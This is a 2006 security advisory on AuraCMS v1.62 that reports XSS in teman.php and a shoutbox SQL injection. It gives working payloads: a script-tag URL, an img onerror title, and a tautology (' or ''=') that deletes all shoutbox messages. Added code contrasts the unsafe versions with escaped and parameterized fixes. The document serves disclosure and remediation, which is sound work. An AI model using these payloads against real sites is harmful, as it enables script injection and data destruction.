by : iFX a.k.a inversFX
_______________________________
[ apem-zigzag (at) telkom (dot) net ]
[ inversfx (at) yahoo (dot) com ]
-------------------------------
location : Jakarta, Indonesia
--------------------------------
date : 29/06/2006
--------------------------------
title : XSS (and shoutbox SQL injection) on `AuraCMS v1.62`
--------------------------------
CMS developer : Arif Supriyanto - arif (at) ayo.kliksini (dot) com
http://www.auracms.tk
http://www.semarang.tk
http://www.ayo.kliksini.com
http://www.auracms.opensource-indonesia.com
--------------------------------
PoC :
--------------------------------------------------------------------
1. In 'teman.php' (the "send to a friend" page) we find this code:
.....
// $judul_artikel ("article title") is never assigned in this file; the PoC
// below reaches it through a GET parameter of the same name, which points
// to register_globals. It is echoed into the page with no HTML encoding.
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....
The interesting part is the variable $judul_artikel: whatever the request
supplies is written into the page verbatim and rendered as markup, so the
page is vulnerable to XSS. Two ways to trigger it:

1st example (reflected, via the URL):
http://localhost/teman.php?judul_artikel=<script>alert("mati dah gwa!!!")</script>
(the alert text is Indonesian slang, roughly "I'm dead!!!")

2nd example (stored): submit an article to the admin with the XSS payload
in its title. Once the article is published, the script runs for every
anonymous visitor who opens index.php.
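The fix for both vectors is the same: the title must be read explicitly from the request and HTML-encoded before it is echoed. The following is an added example written for this page, not AuraCMS code; it puts the unsafe pattern from teman.php beside an escaped version and runs both over the reflected payload above and a constructed stored payload. Function names and the surrounding markup are illustrative assumptions.

```php
<?php
// Added example (not AuraCMS code): the unsafe pattern from teman.php, an
// untrusted article title echoed straight into HTML, beside an escaped
// version. Function names and the surrounding markup are illustrative.

// Vulnerable: the title is interpolated into the page verbatim, so any
// markup in it becomes part of the document.
function render_title_unsafe(string $judul_artikel): string
{
    return "<p class=konten>Anda ingin memberitahu teman Anda tentang "
         . "artikel ini yang berjudul : <b>$judul_artikel</b>.</p>";
}

// Hardened: encode the value for an HTML text context before output.
// ENT_QUOTES also encodes quotes in case the value is ever placed inside an
// attribute; the charset is given explicitly because older PHP releases
// defaulted to ISO-8859-1.
function render_title_safe(string $judul_artikel): string
{
    $safe = htmlspecialchars($judul_artikel, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p class=konten>Anda ingin memberitahu teman Anda tentang "
         . "artikel ini yang berjudul : <b>$safe</b>.</p>";
}

// True if the fragment still contains a tag the browser would act on.
function has_live_markup(string $html): bool
{
    return preg_match('/<(script|img|svg|iframe)\b/i', $html) === 1;
}

// Constructed inputs: the reflected payload from the advisory's first PoC and
// a stored one as it might arrive in a submitted article title.
$payloads = [
    'reflected' => '<script>alert("mati dah gwa!!!")</script>',
    'stored'    => 'Judul artikel <img src=x onerror=alert(1)>',
];

foreach ($payloads as $vector => $judul) {
    printf("[%s] unsafe executes: %s\n", $vector,
        has_live_markup(render_title_unsafe($judul)) ? 'yes' : 'no');
    printf("[%s] safe executes:   %s\n", $vector,
        has_live_markup(render_title_safe($judul)) ? 'yes' : 'no');
    echo '    ', render_title_safe($judul), "\n";
}

// In the hardened teman.php the caller would read the parameter explicitly
// instead of relying on register_globals:
//   $judul_artikel = $_GET['judul_artikel'] ?? '';
//   echo render_title_safe($judul_artikel);
```

htmlspecialchars() is the right encoder only for HTML text and attribute values; a title that is later dropped into a JavaScript string or a URL needs the encoding for that context instead. For the stored variant the encoding must happen at output time on every page that prints the title (index.php included), not only in teman.php.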
---------------------------------------------------------------------
2. The shoutbox lets anyone delete every message in it.
As usual, we can shout anonymously with an arbitrary name, mail address
and pesan (message). Submitting these values:
name  = ' or ''='        <== classic SQL injection tautology
mail  = test_string      <== any free mail address will do
pesan = ' or ''='        <== classic SQL injection tautology
clears every message in the shoutbox. The leading quote closes the string
literal the value is spliced into and ''='' is always true, so the WHERE
clause of whatever query the shoutbox runs evidently matches all rows.
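The advisory does not show the shoutbox query, so the following added example (not AuraCMS code) uses a hypothetical DELETE with the shape in which the reported input would wipe every row, and runs it against a constructed in-memory SQLite shoutbox through PDO (requires the pdo_sqlite extension). It shows the spliced query deleting everything and the same statement with bound parameters deleting nothing; table and column names are assumptions.

```php
<?php
// Added example (not AuraCMS code). The DELETE below is a hypothetical
// reconstruction of a query shape in which the reported input (' or ''=)
// would wipe every row; the real shoutbox query is not shown in the advisory.
// Runs against an in-memory SQLite database via PDO (pdo_sqlite extension).

function make_shoutbox(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE shoutbox (id INTEGER PRIMARY KEY, nama TEXT, mail TEXT, pesan TEXT)');
    // Constructed sample shouts.
    $db->exec("INSERT INTO shoutbox (nama, mail, pesan) VALUES
        ('budi', 'budi@example.com', 'halo semua'),
        ('sari', 'sari@example.com', 'salam kenal'),
        ('andi', 'andi@example.com', 'mantap')");
    return $db;
}

function count_shouts(PDO $db): int
{
    return (int) $db->query('SELECT COUNT(*) FROM shoutbox')->fetchColumn();
}

// Vulnerable: request values spliced into the SQL text. Returns rows deleted.
// With nama = pesan = ' or ''=' the statement becomes
//   DELETE FROM shoutbox WHERE nama='' or ''='' AND pesan='' or ''=''
// and the trailing ''='' is true for every row.
function delete_shout_unsafe(PDO $db, string $nama, string $pesan): int
{
    $sql = "DELETE FROM shoutbox WHERE nama='$nama' AND pesan='$pesan'";
    return $db->exec($sql);
}

// Hardened: the same statement with bound parameters. The input is passed to
// the database as data, so the quote and the tautology are just characters
// compared against the columns.
function delete_shout_safe(PDO $db, string $nama, string $pesan): int
{
    $stmt = $db->prepare('DELETE FROM shoutbox WHERE nama = ? AND pesan = ?');
    $stmt->execute([$nama, $pesan]);
    return $stmt->rowCount();
}

$payload = "' or ''='";   // the name/pesan value from the advisory

$db = make_shoutbox();
echo 'rows before:      ', count_shouts($db), "\n";
echo 'unsafe deleted:   ', delete_shout_unsafe($db, $payload, $payload), "\n";
echo 'rows after unsafe: ', count_shouts($db), "\n";

$db = make_shoutbox();
echo 'safe deleted:     ', delete_shout_safe($db, $payload, $payload), "\n";
echo 'rows after safe:   ', count_shouts($db), "\n";
```

If the CMS still runs on the old mysql_* extension, the minimum fix is to pass every value through mysql_real_escape_string() and keep the quotes around it in the query; bound parameters (PDO or mysqli prepared statements) are the durable fix because they remove string splicing altogether.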
----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------
sorry for my English, cuz I often got REMED (remedial classes)!!!
_________________
/Shout :| |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom kommunity, all hacker kommunity |
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, ||||||||.                     |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, Shock-3d, G4mMa, Big_Red_One }    |
-------------------------------------------------------------------------------------
|OK | Apply | Cancel |
----------------------